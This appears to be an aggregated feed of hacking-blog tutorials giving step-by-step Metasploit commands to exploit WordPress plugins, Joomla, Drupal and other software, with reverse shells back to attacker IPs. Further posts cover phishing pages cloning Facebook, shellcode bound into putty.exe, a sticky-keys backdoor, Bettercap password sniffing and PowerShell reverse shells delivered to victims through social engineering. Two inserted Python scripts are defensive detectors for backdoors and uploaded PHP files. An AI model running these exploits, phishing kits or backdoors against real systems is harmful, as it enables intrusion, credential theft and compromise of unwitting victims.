Channel: Kali Linux Archives - Hacking Articles

Exploit Web Server using WordPress InfusionSoft Upload Vulnerability

This module exploits an arbitrary PHP code upload in the WordPress Infusionsoft Gravity Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file upload and remote code execution.

Exploit Targets

Infusionsoft Gravity Forms plugin 1.5.3

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open a Kali terminal and type msfconsole

Now type use exploit/unix/webapp/wp_infusionsoft_upload

msf exploit (wp_infusionsoft_upload)>set targeturi /wordpress

msf exploit (wp_infusionsoft_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_infusionsoft_upload)>set rport 80

msf exploit (wp_infusionsoft_upload)>exploit       

The post Exploit Web Server using WordPress InfusionSoft Upload Vulnerability appeared first on Hacking Articles.


Hack Web Server using WordPress WP EasyCart Unrestricted File Upload

The WordPress Shopping Cart (WP EasyCart) plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the /inc/amfphp/administration/banneruploaderscript.php script does not properly verify or sanitize user-uploaded files. When a .php file is uploaded, the remote system places the file in a user-accessible path. Making a direct request to the uploaded file allows the attacker to execute the script with the privileges of the web server. In versions <= 3.0.8, authentication can be done using the WordPress credentials of a user with any role. In later versions, a valid EasyCart admin password that is in use by any admin user is required. A default installation of EasyCart will set up a user called “demouser” with a preset password of “demouser”.

Exploit Targets

wp-easycart

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open a Kali terminal and type msfconsole

Now type use exploit/unix/webapp/wp_easycart_unrestricted_file_upload

msf exploit (wp_easycart_unrestricted_file_upload)>set targeturi wordpress

msf exploit (wp_easycart_unrestricted_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_easycart_unrestricted_file_upload)>set rport 80

msf exploit (wp_easycart_unrestricted_file_upload)>exploit       

Hack Remote Windows PC using Office OLE multiple DLL side loading vulnerabilities

Multiple DLL side loading vulnerabilities were found in various COM components. These issues can be exploited by loading these components as an embedded OLE object. When instantiating a vulnerable object, Windows will try to load one or more DLLs from the current working directory. If an attacker convinces the victim to open a specially crafted (Office) document from a directory also containing the attacker’s DLL file, it is possible to execute arbitrary code with the privileges of the target user. This can potentially result in the attacker taking complete control of the affected system.

Exploit Targets

MS Office 2013

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open a Kali terminal and type msfconsole

Now type use exploit/windows/fileformat/ms15_132_dll_sideload

msf exploit (ms15_132_dll_sideload)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms15_132_dll_sideload)>set lhost 192.168.0.119 (IP of Local Host)

msf exploit (ms15_132_dll_sideload)>exploit

After the malicious DLL and PPSX files are generated successfully, they are stored on your local computer in:

/root/.msf4/local

Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.119

exploit

Now send your malicious PPT files to the victim. As soon as they download and open them, you can access a meterpreter shell on the victim's computer.

Weeman – HTTP Server for Phishing

Weeman is a simple Python HTTP server script that creates a powerful phishing page. It works just like other phishing frameworks: it takes the confidential information users type, such as usernames, passwords and credit card numbers, and shows that input to you on the weeman terminal.

So let’s start. First clone the weeman repository from GitHub; to do so type:

git clone https://github.com/Hypsurus/weeman

Then change your directory

cd /root/Desktop/weeman

After that start weeman by typing in terminal:

./weeman.py

Now type show in the terminal to see what is required to create a phishing page. In this article we are creating a Facebook phishing page.

Let’s start, type:

set url http://www.facebook.com

In this command you give the website you want to clone.

Now type:

set port 8080

Now type:

set action_url http://www.facebook.com

This command is used to set the URL where you want to redirect the victim after they give their username and password; in our case we used Facebook.

Now finally type in the terminal:

run

After that it will create an HTTP server and give you a link. Now send that link to the victim using a social engineering technique and wait for the victim to open that link and type their user ID and password.

Bingooo. Now you can automatically see that confidential info on your terminal.

Hack Web Server using Joomla HTTP Header Unauthenticated Remote Code Execution

Joomla suffers from an unauthenticated remote code execution vulnerability that affects all versions from 1.5.0 to 3.4.5. Because user-supplied headers are stored in the database's session table, it’s possible to truncate the input by sending a UTF-8 character. The custom-created payload is then executed once the session is read from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. The PHP patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.

Exploit Targets

Joomla 1.5.0 – 3.4.5

Requirement

Attacker: Kali Linux

Victim PC: Joomla 3.4.5

Open a Kali terminal and type msfconsole

Now type use exploit/multi/http/joomla_http_header_rce

msf exploit (joomla_http_header_rce)>set payload php/meterpreter/reverse_tcp

msf exploit (joomla_http_header_rce)>set lhost 192.168.0.106 (IP address of kali Linux)

msf exploit (joomla_http_header_rce)>set targeturi /joomla/

msf exploit (joomla_http_header_rce)>set rhost 192.168.0.104 (IP of Remote Host)

msf exploit (joomla_http_header_rce)>set rport 80

msf exploit (joomla_http_header_rce)>exploit

Hack Web Server using PHP Utility Belt Remote Code Execution

This module exploits a remote code execution vulnerability in PHP Utility Belt, which is a set of tools for PHP developers and should not be installed in a production environment, since this application runs arbitrary PHP code as an intended functionality.

Exploit Targets

PHP Utility Belt

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open a Kali terminal and type msfconsole

Now type use exploit/multi/http/php_utility_belt_rce

msf exploit (php_utility_belt_rce)>set targeturi /php-utility-belt-master/ajax.php

msf exploit (php_utility_belt_rce)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (php_utility_belt_rce)>set rport 80

msf exploit (php_utility_belt_rce)>exploit        

Hack Web Server using ATutor 2.2.1 SQL Injection / Remote Code Execution

This module exploits a SQL injection vulnerability and an authentication weakness in ATutor. This essentially means an attacker can bypass authentication and reach the administrator’s interface where they can upload malicious code.

Exploit Targets

ATutor 2.2.1

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open a Kali terminal and type msfconsole

Now type use exploit/multi/http/atutor_sqli

msf exploit (atutor_sqli)>set targeturi /Atutor/

msf exploit (atutor_sqli)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (atutor_sqli)>set rport 80

msf exploit (atutor_sqli)>exploit       

Hack Remote Server using WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution

This module exploits an arbitrary PHP code execution flaw in the WordPress blogging software plugin known as Foxypress. The vulnerability allows for arbitrary file upload and remote code execution via the uploadify.php script. The Foxypress plugin versions 0.4.1.1 to 0.4.2.1 are vulnerable.

Exploit Targets

Foxypress plugin versions 0.4.1.1 to 0.4.2.1

Requirement

Attacker: Kali Linux

Victim PC: Foxypress plugin

Open a Kali terminal and type msfconsole

Now type use exploit/unix/webapp/wp_foxypress_upload

msf exploit (wp_foxypress_upload)>set targeturi /wordpress

msf exploit (wp_foxypress_upload)>set rhost 192.168.0.105 (IP of Remote Host)

msf exploit (wp_foxypress_upload)>set rport 80

msf exploit (wp_foxypress_upload)>exploit

Hack Drupal Website Server using Drupal HTTP Parameter Key/Value SQL Injection

This module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32).

Exploit Targets

Drupal 7.0

Requirement

Attacker: Kali Linux

Victim PC: Drupal 7.0

Open a Kali terminal and type msfconsole

Now type use exploit/multi/http/drupal_drupageddon

msf exploit (drupal_drupageddon)>set targeturi /drupal/

msf exploit (drupal_drupageddon)>set rhost 192.168.0.109 (IP of Remote Host)

msf exploit (drupal_drupageddon)>set rport 80

msf exploit (drupal_drupageddon)>exploit         

Find Your Website History using Waybackpack

Waybackpack is a command-line tool that lets you download the entire Wayback Machine archive for a given URL.

Open your Kali Linux terminal, go to the desktop and type the following command:

git clone https://github.com/jsvine/waybackpack.git

Now go to the waybackpack folder and type the following command:

pip install waybackpack

Now run the following command to view any website for a particular year and save the result in .html format in the desired folder.

In the example below I’m using hackingarticles.in for the year 2010 and saving the result in /Downloads/hacking-wayback

Now you will see the saved file in the desired folder.

See the result below

Web Server Penetration Testing with DVWA and Metasploit (Beginner Guide)

Open your Kali Linux terminal and type:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.140 lport=4444 -f raw

It will generate the raw code of a PHP file.

Now copy the generated code into a text file and save it on your desktop with a .php extension.

Now open the DVWA web app on your server and log in with the following credentials:

Username – admin

Password – password

Now scroll to the File Upload section in the left pane and upload the PHP file created above.

When the upload finishes, it will show you the path.

Now open your uploaded file in the browser.

Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.140

set lport 4444

exploit

Now you can access the victim’s server

Hack Remote Windows 10 PC using Cypher (Adding Shellcode to PE files)

First clone the cypher repository from GitHub; to do so type:

git clone https://github.com/xan7r/cypher.git

Now choose an executable file and copy it to the cypher folder to bind cypher with any .exe file.

Here in my case I have copied putty.exe as the file to bind with cypher.

Note: only executable files can be bound.

Now run the following command

python addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 -p 0

Specify payload.  Default shell_reverse_tcp.  Valid values are:

0 – windows/shell_reverse_tcp

1 – windows/meterpreter/reverse_http

2 – windows/meterpreter/reverse_http +PrependMigrate

3 – windows/meterpreter/reverse_https

4 – windows/meterpreter/reverse_https +PrependMigrate

Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed. Start Metasploit using msfconsole

use exploit/multi/handler

set payload windows/shell_reverse_tcp

set lhost 192.168.0.105

set lport 4444

exploit

Now send the bound putty_evil.exe to the victim; as soon as he opens the file, a shell session will open.

Hack Remote Windows PC using Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection

This module exploits a vulnerability found in Dell SonicWALL Scrutinizer. The methodDetail parameter in exporters.php allows an attacker to write arbitrary files to the file system with an SQL Injection attack, and gain remote code execution under the context of SYSTEM for Windows, or as Apache for Linux. Authentication is required to exploit this vulnerability, but this module uses the default admin:admin credential.

Exploit Targets

Dell SonicWALL Scrutinizer 11.01

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open a Kali terminal and type msfconsole

Now type use exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>set payload windows/meterpreter/reverse_tcp

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>set lhost 192.168.0.108 (IP of Local Host)

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>set rhost 192.168.0.120

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>exploit

Exploit Remote PC using Advantech WebAccess Dashboard Viewer upload Image Common Arbitrary File Upload

This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to upload arbitrary code (instead of an image) to the server, which will then be executed under the high-privilege context of the IIS AppPool.

Exploit Targets

Advantech WebAccess 8.0

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open a Kali terminal and type msfconsole

Now type use exploit/windows/scada/advantech_webaccess_dashboard_file_upload

msf exploit (advantech_webaccess_dashboard_file_upload)>set lhost 192.168.0.108 (IP of Local Host)

msf exploit (advantech_webaccess_dashboard_file_upload)>set rhost 192.168.0.102

msf exploit (advantech_webaccess_dashboard_file_upload)>set rport 80

msf exploit (advantech_webaccess_dashboard_file_upload)>set targeturi /

msf exploit (advantech_webaccess_dashboard_file_upload)>exploit

Access Sticky keys Backdoor on Remote PC with Sticky Keys Hunter

This bash script tests for sticky keys and utilman backdoors. The script will connect to an RDP server, send both the sticky keys and utilman triggers, and screenshot the result.

How does it work?

  • Connects to RDP using rdesktop
  • Sends shift 5 times using xdotool to trigger sethc.exe backdoors
  • Sends Windows+u using xdotool to trigger utilman.exe backdoors
  • Takes screenshot
  • Kills RDP connection

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Bypass the UAC Protection of Victim PC (Tutorial How to Bypass UAC Protection)

After getting the session, enable the remote desktop option of the remote PC using the following exploit:

msf > use post/windows/manage/enable_rdp

msf post(enable_rdp) > set session 2

msf post(enable_rdp) > exploit

In the next step, replace sticky keys with the command prompt using the following exploit:

msf > use post/windows/manage/sticky_keys

msf post(sticky_keys) > set session 2

msf post(sticky_keys) > exploit

Now clone Sticky Keys Hunter repository from github, to do so type:

git clone https://github.com/ztgrace/sticky_keys_hunter.git

To scan a single host: ./stickyKeysHunter.sh 192.168.0.120

Now a pop-up will open like below

Now press the shift key 5 times at the login screen and a command prompt will open up

Now you can do anything on the victim PC through the command prompt. I am using the net user command to see the list of active accounts
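
One way to check a host or a mounted disk image for the backdoor this article relies on, as an added example that is not part of the original post or of Sticky Keys Hunter: it looks for an accessibility program that is byte-identical to cmd.exe and for an Image File Execution Options Debugger value set on one. The program names beyond sethc.exe and utilman.exe, the directory contents and the .reg text are constructed assumptions.

```python
import hashlib
import os
import re
import tempfile

# sethc.exe and utilman.exe are the triggers named in the article; the other
# logon-screen accessibility programs are included here as an assumption.
ACCESSIBILITY = {"sethc.exe", "utilman.exe", "osk.exe", "magnify.exe", "narrator.exe"}
SHELLS = ["cmd.exe"]

KEY_RE = re.compile(r"^\[.*\\Image File Execution Options\\([^\\\]]+)\]$", re.I)
DBG_RE = re.compile(r'^"Debugger"="(.*)"$', re.I)


def sha256(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def replaced_binaries(system32):
    """Accessibility programs whose bytes are identical to a shell binary."""
    shells = {}
    for name in SHELLS:
        path = os.path.join(system32, name)
        if os.path.isfile(path):
            shells[sha256(path)] = name
    hits = []
    for name in sorted(ACCESSIBILITY):
        path = os.path.join(system32, name)
        if os.path.isfile(path) and sha256(path) in shells:
            hits.append((name, shells[sha256(path)]))
    return hits


def ifeo_debuggers(reg_text):
    """Debugger values set on accessibility programs in decoded .reg text."""
    hits, current = [], None
    for line in reg_text.splitlines():
        line = line.strip()
        key = KEY_RE.match(line)
        if key:
            current = key.group(1).lower()
        elif line.startswith("["):
            current = None
        else:
            dbg = DBG_RE.match(line)
            if dbg and current in ACCESSIBILITY:
                hits.append((current, dbg.group(1).replace("\\\\", "\\")))
    return hits


# Constructed sample: text in the layout of an exported IFEO registry key.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000000
'''


def demo():
    # Constructed stand-ins for a System32 directory; not real binaries.
    with tempfile.TemporaryDirectory() as system32:
        files = {
            "cmd.exe": b"MZ constructed cmd stand-in",
            "utilman.exe": b"MZ constructed cmd stand-in",   # overwritten copy
            "sethc.exe": b"MZ constructed sethc stand-in",   # untouched file
        }
        for name, data in files.items():
            with open(os.path.join(system32, name), "wb") as fh:
                fh.write(data)
        return replaced_binaries(system32), ifeo_debuggers(SAMPLE_REG)
```

Either finding on a real system means the logon screen can launch a shell before authentication, so the host should be treated as compromised rather than simply repaired.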

Hack Gmail and Facebook Password in Network using Bettercap

Note: In my case this trick works for only Internet Explorer users

Bettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive feature you could need in order to perform a man in the middle attack.

Go to Kali Linux terminal and type:

git clone https://github.com/evilsocket/bettercap.git

It will clone bettercap from GitHub and store it in your root directory.

After that, change your directory. Now it’s time to install bettercap and its dependencies; it will use Ruby gems to install all its required dependencies.

To install, type:

gem build bettercap.gemspec

Now type:

sudo gem install bettercap*.gem

It will install bettercap and all its dependencies using gem.

Now that we have installed Bettercap, start the sniffer to sniff the network.

Type in terminal:

bettercap --proxy -P post

Here you can see the hacked Facebook account and the victim’s username and password.

See the example below:

Hack WordPress Server using WordPress SlideShow Gallery Authenticated File Upload

The WordPress SlideShow Gallery plugin contains an authenticated file upload vulnerability. An attacker can upload arbitrary files to the upload folder. Since the plugin uses its own file upload mechanism instead of the WordPress API, it’s possible to upload any file type.

Exploit Targets

wordpress

Requirement

Attacker: Kali Linux

Victim PC: WordPress

Open a Kali terminal and type msfconsole

Now type use exploit/unix/webapp/wp_slideshowgallery_upload

msf exploit (wp_slideshowgallery_upload)>set targeturi /

msf exploit (wp_slideshowgallery_upload)>set rhost 192.168.0.104 (IP of Remote Host)

msf exploit (wp_slideshowgallery_upload)>set rport 80

msf exploit (wp_slideshowgallery_upload)>set wp_user user

msf exploit (wp_slideshowgallery_upload)>set wp_password bitnami

msf exploit (wp_slideshowgallery_upload)>exploit          

Hacking WordPress using Ninja Forms Unauthenticated File Upload

Versions 2.9.36 to 2.9.42 of the Ninja Forms plugin contain an unauthenticated file upload vulnerability, allowing guests to upload arbitrary PHP code that can be executed in the context of the web server.

Exploit Targets

ninja forms 2.9.36

Requirement

Attacker: Kali Linux

Victim PC: wordpress

Open a Kali terminal and type msfconsole

Now type use exploit/unix/webapp/wp_ninja_forms_unauthenticated_file_upload

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set targeturi /wordpress/

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set rhost 192.168.0.106 (IP of Remote Host)

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set form_path /test/

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set rport 80

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>exploit        
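
A defensive check for the upload flaws described in the WordPress plugin articles on this page (Infusionsoft, WP EasyCart, Foxypress, SlideShow Gallery, Ninja Forms), added here as an example and not taken from the original posts or from any of the plugins. It walks an upload directory and flags files that a PHP-enabled server could execute; the extension list, the sample file names and their contents are constructed assumptions.

```python
import os
import re
import tempfile

# Extensions a PHP-enabled server may pass to the interpreter. Assumed list:
# confirm against the handler mapping of the server being audited.
SCRIPT_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".pht"}
# Files that can change how the server treats everything else in the directory.
OVERRIDES = {".htaccess", ".user.ini", "web.config"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def classify(path):
    """Return the reasons a file found in an upload directory is suspicious."""
    reasons = []
    name = os.path.basename(path).lower()
    # Check every dotted suffix so photo.php.jpg is caught as well as x.php.
    suffixes = {"." + part for part in name.split(".")[1:]}
    if suffixes & SCRIPT_EXTS:
        reasons.append("script-extension")
    if name in OVERRIDES:
        reasons.append("handler-override")
    with open(path, "rb") as fh:
        # Only the first 1 MiB of each file is scanned for an opening tag.
        if PHP_TAG.search(fh.read(1 << 20)):
            reasons.append("php-open-tag")
    return reasons


def audit_uploads(root):
    """Map relative path -> reasons for every suspicious file under root."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            reasons = classify(full)
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings


def demo():
    """Build a constructed upload directory and audit it."""
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 32
    samples = {
        "banner.jpg": jpeg,                                   # benign image
        "upload.php": b"<?php /* constructed sample */ ?>",   # plain script
        "photo.php.jpg": jpeg,                                # double extension
        "avatar.png": b"\x89PNG\r\n\x1a\n<?php /* x */ ?>",   # code inside image
        ".htaccess": b"# constructed sample\n",               # handler override
    }
    with tempfile.TemporaryDirectory() as root:
        for name, data in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)
        return audit_uploads(root)


if __name__ == "__main__":
    for path, reasons in sorted(demo().items()):
        print(f"{path}: {', '.join(reasons)}")
```

Point `audit_uploads` at the site's wp-content/uploads directory and any plugin-specific upload folders; the durable fix is still to update or remove the affected plugin and to disable script execution in upload paths.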

Penetration Testing in WordPress Website using WordPress Exploit Framework

A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.

First clone the WPXF repository from GitHub; to do so type:

git clone https://github.com/rastating/wordpress-exploit-framework.git

Now open a Kali Linux terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running ruby wpxf.rb.

Once loaded, you’ll be presented with the wpxf prompt; from here you can search for modules using the search command or load a module using the use command.

wpxf > use exploit/reflex_gallery_shell_upload

wpxf [exploit/reflex_gallery_shell_upload] > set host 192.168.0.104

wpxf [exploit/reflex_gallery_shell_upload] > set target_uri /

wpxf [exploit/reflex_gallery_shell_upload] > set payload reverse_tcp

wpxf [exploit/reflex_gallery_shell_upload] > set lhost 192.168.0.105

wpxf [exploit/reflex_gallery_shell_upload] > run

Hack Remote PC with Reverse PowerShell using Brosec

Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec’s most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard.

First install the Brosec tool in your Kali Linux. Follow the steps below one by one:

Reference:

https://github.com/gabemarshall/Brosec

  • apt-get install npm build-essential g++ xsel netcat – Install dependencies
  • npm config set registry http://registry.npmjs.org/ – Npm registry seems to be broken by default when installed from Kali repos
  • npm install -g n – Install n (nodejs version manager)
  • n latest – Install latest version of nodejs
  • git clone https://github.com/gabemarshall/Brosec.git – Clone Brosec repo
  • cd Brosec && npm install – cd into the directory and install npm dependencies

After that start Brosec by typing in terminal:

./bros

It will show you menu options.

Now set the IP of your localhost:

set lhost 192.168.0.111

Now set the lport:

set lport 4444

After setting the localhost and lport, choose option 5 Miscellaneous.

You will see 2 options, Reverse Shells and Exfiltration. Now select option 1 Reverse Shells, see the image below:

After choosing the option Reverse Shells, you will see 5 options. In my case I’m selecting option 4 Reverse Shell PSH

Now it will show you a message Should I start a netcat listener for you?

Press Y to start the netcat listener. It will generate a powershell script, see the below picture.

Copy this code into a text editor and save it with the .ps1 (PowerShell) extension.

Now send the saved .ps1 file to the victim using any social engineering method. When the victim clicks on it, you will get the session of the victim’s PC. See the picture below for reference.

Now you can use the systeminfo command to get the information of the victim’s PC.
